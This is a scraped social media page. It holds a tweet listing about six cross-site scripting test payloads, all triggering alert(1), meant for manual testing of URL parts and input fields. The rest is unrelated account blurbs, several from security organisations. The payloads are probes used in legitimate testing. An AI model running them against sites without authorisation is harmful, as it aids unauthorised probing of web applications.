Here's a small #XSS list for manual testing (main cases, high success rate).
"><img src onerror=alert(1)>
"autofocus onfocus=alert(1)//
</script><script>alert(1)</script>
'-alert(1)-'
\'-alert(1)//
javascript:alert(1)
Try it on:
- URL query, fragment & path;
- all input fields.
700 Followers 0 FollowingIG :zhuyilongins 🇨🇳 Chinese actor ZhuYiLong❤️ Follow to see daily updates about ZhuYiLong ASAP 朱一龙,中国内地男演员,1988.04.16 🎂作品:《家宴》《镇魂》《许你浮生若梦》《知否》等
1.3M Followers 648 FollowingTrack air traffic in real time from all around the world!
Apps: https://t.co/AnZhJUIrBg | FAQ: https://t.co/WkTgAaePHs | Support: https://t.co/BomORktp7R
49K Followers 621 FollowingThe power behind the @Synack platform is an elite team of the world's top cybersecurity researchers. Our best are honored at https://t.co/6bEAyp7HWJ
4K Followers 31 Following{{fname}} {{lname}}
Twitter bookmark account. Used to prevent spamming my regular twitter followers with boring appsec tweets.
114K Followers 520 FollowingMITRE ATT&CK® - A knowledge base for describing the behavior of adversaries. Replying/Following/Re-tweeting ≠ endorsement. @ https://t.co/wt46ArkZVt
143K Followers 1K FollowingWork for yourself and make $10k/mo, from wherever, whenever 🤝
• Subscribe: https://t.co/BuyZXNWzZC
• Sponsor: https://t.co/3XH0Vfet1Q
195K Followers 14K FollowingWe help professionals acquire the skills, knowledge and certificates by teaching defense through offense to advance their careers in cybersecurity.
56K Followers 3 FollowingOfficial account maintained by the CVE™ Program to notify the community of new CVE IDs. Posts contain abbreviated details. Full CVE Records on https://t.co/ALn4YvUtom
27K Followers 0 FollowingNo longer in this cesspool. Just popped by to announce my https://t.co/ktI8HgxRAQ. Not doing DMs, not looking for likes. See you in the next book :-)
45K Followers 2K Following(Grumpy Old) Hacker. Co-founder @GDI_FDN. Co-founder @DIVDnl. Co-founder and CEO of https://t.co/Gfgrg51IjY. Unfiltered on https://t.co/6hPoWNR9jw.
123K Followers 3K FollowingCybersecurity pros: Rapid7 lets you command your attack surface, smash silos, stay steps ahead of attackers, and take breaches from “inevitable” to preventable.